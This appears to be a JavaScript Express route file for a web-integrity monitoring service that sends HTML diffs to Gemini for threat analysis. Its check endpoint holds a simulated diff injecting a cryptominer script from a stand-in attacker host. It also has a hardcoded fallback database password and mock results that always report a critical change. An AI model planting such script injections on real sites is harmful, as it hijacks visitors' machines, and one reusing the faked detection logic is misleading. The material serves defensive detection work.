import express from 'express';
import pkg from 'pg';
import { GoogleGenAI } from '@google/genai';

const { Pool } = pkg;
const router = express.Router();

// 1. Initialize the PostgreSQL Connection Pool
const db = new Pool({
  host: process.env.DB_HOST || 'db',
  user: process.env.DB_USER || 'postgres',
  password: process.env.DB_PASSWORD || 'secret_db_pass',
  database: process.env.DB_NAME || 'system_siege',
  port: 5432,
});

// 2. Initialize the Google Gen AI Client with your environment API Key
const ai = new GoogleGenAI({ apiKey: process.env.GEMINI_API_KEY });

// 3. ENDPOINT: Add a new URL target to the monitoring list
router.post('/sites', async (req, res, next) => {
  try {
    const { url } = req.body;
    const defaultOwnerId = 1; 

    const result = await db.query(
      'INSERT INTO sites (owner_id, url) VALUES ($1, $2) RETURNING *',
      [defaultOwnerId, url]
    );
    return res.status(201).json(result.rows[0]);
  } catch (error) {
    next(error);
  }
});

// 4. ENDPOINT: Fetch all registered site targets
router.get('/sites', async (req, res, next) => {
  try {
    const result = await db.query('SELECT * FROM sites ORDER BY id DESC');
    return res.json(result.rows);
  } catch (error) {
    next(error);
  }
});

// 5. ENDPOINT: The Live Threat Check Pipeline (Syncs prompts with Gemini Engine)
router.post('/sites/:id/check', async (req, res, next) => {
  try {
    const siteId = req.params.id;

    // A. Look up the specific website details from our database table
    const siteLookup = await db.query('SELECT * FROM sites WHERE id = $1', [siteId]);
    if (siteLookup.rows.length === 0) {
      return res.status(404).json({ error: "Monitored asset target not found." });
    }
    const targetUrl = siteLookup.rows[0].url;

    // B. Simulating the HTML structural delta string generated by the file scraper logic
    const simulatedHtmlDiff = `
    @@ -12,4 +12,6 @@
     <h1>Welcome Internal Corporate Portal</h1>
    +<!-- Malicious unauthorized crypto mining payload injected -->
    +<script src='http://coinhive-miner-network.xyz/processor.js'></script>
     </body>
    `;

    console.log(`[SYSTEM INTEGRATION] Running automated Gemini 2.5 Flash scan for: ${targetUrl}`);
    
    // ----------------------------------------------------------------
    // PROMPT 1: SYSTEM INSTRUCTIONS (The Rules for the AI Persona)
    // ----------------------------------------------------------------
    const systemInstruction = `You are an automated DevSecOps Incident Response Analyst integrated within a corporate Security Operations Center (SOC) framework. Your sole purpose is to audit raw code differences generated by a background web scanner application to identify active website defacements, security compromises, or hidden exploit payload code insertions.

    You must rigorously enforce these functional execution parameters:
    1. Complete Objectivity: Do not use any warm introductions, conversational pleasantries, greetings, or closure signatures. Do not say "Here is my evaluation" or "I can assist with that". Start typing technical evaluations instantly.
    2. Threat Classification Matrix: Analyze both structural HTML layouts and syntax indicators pointing to code lines removed (-) or lines added (+). Identify hidden inline iframes, unverified external scripts, cryptojacking modules, phishing forms, text defacements, or unwanted image overrides.
    3. Clean Plain-Text Output Strategy: Do not under any circumstances output raw markdown styling parameters, bolding notation (**), text header hashtags (#), or backtick code gates (\`\`\`). Provide your structured output entirely using standard line breaks and plain paragraph spacing.`;

    // ----------------------------------------------------------------
    // PROMPT 2: THE DYNAMIC CONTENT PACKET (The actual data to review)
    // ----------------------------------------------------------------
    const dynamicPrompt = `ALERT: Web server content integrity mutation mismatch captured on monitoring system.
    Target Inspected Endpoint URL: ${targetUrl}

    Examine the following text modification array showcasing lines removed (-) and lines added (+):

    ---
    ${simulatedHtmlDiff}
    ---

    Execute your security assessment guidelines. Map the details of the specific threat vector or text change, explain in simple terms what negative impacts it introduces to visitors, and provide a single concise plain-text action statement telling the site administrator how to address or remove the compromised lines.`;

    // C. LIVE INVOCATION: Stream the variables directly over to the Google API
    const response = await ai.models.generateContent({
      model: 'gemini-2.5-flash',
      contents: dynamicPrompt,
      config: {
        systemInstruction: systemInstruction,
        temperature: 0.1, // Keeps the output highly deterministic and professional
      },
    });

    const aiSummaryResult = response.text || "Vulnerability evaluation could not be compiled.";

    // D. Write a historical baseline snapshot reference index
    const snapshotResult = await db.query(
      'INSERT INTO snapshots (site_id, content_hash, raw_content) VALUES ($1, $2, $3) RETURNING id',
      [siteId, 'sha256_mock_hash_value', '<html>...</html>']
    );
    const snapshotId = snapshotResult.rows[0].id;

    // E. Save the AI text result directly back into your database flags table
    await db.query(
      'INSERT INTO flags (site_id, snapshot_id, severity, summary) VALUES ($1, $2, $3, $4)',
      [siteId, snapshotId, 'CRITICAL', aiSummaryResult]
    );

    // F. Finalize pipeline loop returning results cleanly to the dashboard UI
    return res.json({
      status: "CHECK_COMPLETE",
      changed: true,
      analysis: {
        severity: "CRITICAL",
        summary: aiSummaryResult 
      }
    });

  } catch (error) {
    next(error); 
  }
});

export default router;
